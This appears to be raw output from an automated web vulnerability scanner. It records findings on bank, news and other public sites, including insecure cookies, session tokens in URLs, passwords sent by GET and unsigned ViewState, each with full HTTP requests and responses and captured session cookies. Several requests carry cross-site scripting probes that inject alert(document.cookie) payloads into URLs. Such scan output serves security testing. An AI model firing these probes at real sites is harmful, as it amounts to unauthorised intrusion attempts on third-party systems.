The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1727290122.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 4878 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2062834442.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wf/product/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT X-Cnection: close Location: https://www.wellsfargo.com:443/customerApp/product/apply Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure Content-Language: en Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com:443/cus ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2113166090.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 10682 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/bill_pay/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:32 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Online - Bill Pay< ...[SNIP]...
7. Session token in URLpreviousnext There are 8 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /usa_atm/ HTTP/1.1 Host: visa.via.infonow.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29 Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml" Content-Language: en-US Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 29339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- Template: InsideP ...[SNIP]... <link href='http://www.arbornetworks.com/components/com_securityimages/securityimages.css' rel='stylesheet' type='text/css'/><img src='http://www.arbornetworks.com/components/com_securityimages/plugins/core/1.1/imageGenerator.php?refid=430676c291d53f0c137a6af08cedc7a54c3d3abe&size=&sessionid=68a202e1a5cc93aaa19630ecb49b46a8' title='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' alt='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' id='PFSecurity' name='PFSecurity' border='0'><a href="javascript:SecurityImagesNew('PFSecurity','PFSecurity_try', 'PFSecurity_reload');" id='askNewPicture' title='Ask a new picture' alt='Ask a new picture'> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- Template: InsideP ...[SNIP]... <link href='http://www.arbornetworks.com/components/com_securityimages/securityimages.css' rel='stylesheet' type='text/css'/><img src='http://www.arbornetworks.com/components/com_securityimages/plugins/core/1.1/imageGenerator.php?refid=c90ab5512d38a70929ae7fc2a99f3c2d34fa1e75&size=&sessionid=bcc07bd00e8de905ed6e6f0d69bfca86' title='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' alt='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' id='PFSecurity' name='PFSecurity' border='0'><a href="javascript:SecurityImagesNew('PFSecurity','PFSecurity_try', 'PFSecurity_reload');" id='askNewPicture' title='Ask a new picture' alt='Ask a new picture'> ...[SNIP]...
GET /2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html HTTP/1.1 Host: www.kansascity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/1.3.41 Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 01:13:01 GMT ETag: "1e3db5c-e2bf-4d4a011d" Accept-Ranges: bytes Content-Length: 58047 Content-Type: text/html Expires: Thu, 03 Feb 2011 01:16:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 01:16:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
...[SNIP]... <li><a href="http://www.kansascity.com/placead/?catid=784&-session=ComboAd:3F4CE782%0A032091B4EFpyUGD8BCA5">Sell A Car</a> ...[SNIP]... <li><a href="http://www.cars.com/go/dealersearch/specials.jsp;jsessionid=YKUYUUH4MLJIXLAYIETE2UY?specialsURL=http%3A%2F%2Fcars.adperfect.com%2Findex%2Faffiliate%2Findex.html%3Fapn%3Dkansascity&apn=kansascity&aff=kansascity">Used Car Specials</a> ...[SNIP]... <li><a href="http://www.cars.com/go/dealersearch/specials.jsp;jsessionid=YKUYUUH4MLJIXLAYIETE2UY?specialsURL=http%3A%2F%2Fcars.adperfect.com%2Findex%2Faffiliate%2Findex.new.html%3Fapn%3Dkansascity&apn=kansascity&aff=kansascity">New Car Specials</a> ...[SNIP]... <li><a href="http://www.kansascity.com/placead/?catid=779&-session=ComboAd:3F4CE7%0A82032091B273HPYGD7BB43">Sell A Home</a> ...[SNIP]...
GET / HTTP/1.1 Host: www.lokeshdhakar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:01 GMT Server: Apache X-Pingback: http://www.lokeshdhakar.com/xmlrpc.php Vary: Accept-Encoding Content-Length: 37290 Connection: close Content-Type: text/html; charset=utf-8
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
The page contains a form with the following action URL, which is submitted using the GET method:
http://fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1 Host: www.boston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- Need for HL --> <script language="JavaScript"><!--
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 17909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/view/bluefin_brigade_to_the_rescue HTTP/1.1 Host: food.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: online.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 18175 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:13 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: pncpoints.visaextras.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/stepthree HTTP/1.1 Host: www.cualn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:00:30 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS5dcca8fe1cebbc00afd6b71bc7e17676=0505b6f8eb0dfb02deb4a1644b2c68ec; expires=Sat, 26-Feb-2011 04:33:50 GMT; path=/; domain=.cualn.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:00:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.directstartv.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tag/ipboard HTTP/1.1 Host: www.forum-software.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cron_image.html HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imagecode.html?article_id=21109 HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/lang.php HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=wareseekercom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90|468x60&p=16284953&a=1&flashVer=10&ver=1.20¢er=1&noAd=1&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&rurl=http%3A%2F%2Fburp%2Fshow%2F30&f=0&rnd=16284848 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 